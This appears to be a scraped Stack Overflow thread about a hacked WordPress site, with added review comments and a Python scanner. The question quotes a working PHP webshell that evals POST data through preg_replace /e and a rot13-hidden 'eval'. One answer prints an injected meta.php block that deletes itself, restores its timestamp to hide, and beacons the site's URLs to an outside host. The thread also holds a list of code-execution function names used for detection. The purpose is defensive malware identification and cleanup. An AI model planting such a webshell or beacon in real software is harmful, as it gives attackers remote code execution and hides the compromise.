WordPress Site hacked? Suspicious PHP file

Submitted by 萝らか妹 on 2019-12-27 05:22:29

Question


I found a suspicious PHP file /wp-includes/mera.php

Content:

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

Could @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); possibly do something malicious?


Answer 1:


Delete the file instantly!

This PHP code is a modified webshell. Those could be used to attack other websites and could lead to serious legal problems!

After deletion you should also fix the leak that let the file in!




Answer 2:


Yes, the PHP script allows code to be run on the server.

Source: http://wordpressvirusremoval.com/blog/execute-a-php-code-through-post-veriable-with-preg_replace-e-modifier/

Through diff'ing with a clean WP tarball, I found meta.php was modified:

988,1004d987
<
< check_meta();
< function check_meta(){
<     $jp = __FILE__;
<     $jptime = filemtime($jp);
<
<     if(time() >= 1472456239){
<         $jp_c = file_get_contents($jp);
<         if($t = @strpos($jp_c,"check_meta();")) {
<             $contentp = substr($jp_c,0,$t);
<             if(@file_put_contents($jp, $contentp)){
<                 @touch($jp,$jptime);
<             }
<         }
<     }
<     @file_get_contents("http://web.51.la:82/go.asp?svid=1&id=18944722&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/mera.php");
< }
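
Review bot: `@touch($jp,$jptime);` inside the `time() >= 1472456239` branch restores the original mtime of meta.php after the block has cut itself out of the file, so a search by modification time will not surface this change; rely on a checksum comparison against a clean tarball, as was done here. The final `@file_get_contents(...)` line runs each time `check_meta()` is called and sends `$_SERVER['HTTP_REFERER']` and the mera.php URL to web.51.la:82, so restore meta.php from the clean copy rather than trimming lines by hand, and review outbound request logs for that host to see when the block was active.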

FYI, here are the md5sums of infected files:

898af479fe6cc3af461c1878763d19f4  ./wp-includes/meta.php
b657d7c9d9be52771750091df0751fda  ./wp-includes/mera.php
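
A static check for the construct found in mera.php, as an added example that is not part of the original question or answers: it flags preg_replace calls whose pattern carries the /e modifier and decodes str_rot13 literals, which shows that 'riny' is 'eval'. The function names, the keyword list and the benign sample are assumptions made for this illustration.

```python
import codecs
import re

# Constructed sample: the one-line body of mera.php as quoted in the question.
MERA_PHP = r"""<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>"""
# Constructed benign sample: preg_replace without the /e modifier.
BENIGN_PHP = r"""<?php echo preg_replace('/\s+/u', ' ', $title); ?>"""

# str_rot13() applied to a quoted literal.
ROT13_CALL = re.compile(r"""str_rot13\(\s*(['"])([A-Za-z_]+)\1\s*\)""")
# First preg_replace argument as a quoted literal: delimiter, pattern, delimiter, modifiers.
# Bracket-style delimiters such as {..} are not handled by this sketch.
PREG_CALL = re.compile(
    r"""preg_replace\s*\(\s*(['"])(?P<delim>[^\w\s\\])(?P<pat>.*?)(?P=delim)(?P<mods>[A-Za-z]*)\1""",
    re.S)
# Assumed list of PHP names that execute code or commands.
CODE_EXEC = {"eval", "assert", "system", "exec", "passthru", "shell_exec"}

def decode_rot13_literals(src):
    """Replace str_rot13('literal') with the decoded literal so hidden names are visible."""
    return ROT13_CALL.sub(lambda m: "'" + codecs.decode(m.group(2), "rot_13") + "'", src)

def scan_php(src):
    """Return a list of findings for one PHP source string."""
    findings = []
    for m in PREG_CALL.finditer(src):
        # /e evaluates the replacement string as PHP code
        # (deprecated in PHP 5.5, removed in PHP 7.0).
        if "e" in m.group("mods"):
            findings.append("preg_replace /e modifier on pattern %r" % m.group("pat"))
    for m in ROT13_CALL.finditer(src):
        name = codecs.decode(m.group(2), "rot_13")
        if name in CODE_EXEC:
            findings.append("str_rot13(%r) decodes to %r" % (m.group(2), name))
    # Only worth reporting when something above already looked suspicious.
    if findings and re.search(r"\$_(POST|GET|REQUEST|COOKIE)\b", src):
        findings.append("request data reaches the same file")
    return findings

if __name__ == "__main__":
    print(decode_rot13_literals(MERA_PHP))
    for line in scan_php(MERA_PHP):
        print("mera.php:", line)
    print("benign findings:", scan_php(BENIGN_PHP))
```
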



Answer 3:


You should install something like the Wordfence plugin on your website, which will check all of the plugin and theme folders continuously against the official release versions. It will also help prevent dangerous file uploads like this.



Source: https://stackoverflow.com/questions/39012433/wordpress-site-hacked-suspicious-php-file
